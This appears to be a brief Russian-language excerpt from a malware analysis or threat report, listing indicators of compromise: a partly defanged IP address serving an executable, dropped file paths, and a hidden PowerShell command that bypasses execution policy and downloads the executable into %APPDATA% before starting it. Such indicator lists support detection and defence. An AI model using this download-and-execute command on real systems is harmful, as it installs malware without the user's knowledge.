Техническая информация
- http://19#.#2.66.104/inn1jhfhkpvxgrd.exe как %appdata%\0eu1qgr8cip.exe
- %TEMP%\abctfhghgdghghГї.sct
- http://19#.#2.66.104/Inn1JHfHkPvxGRd.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://19#.#2.66.104/Inn1JHfHkPvxGRd.exe','%APPDATA%\0eu1QGr8Cip.exe');Start-...' (со скрытым окном)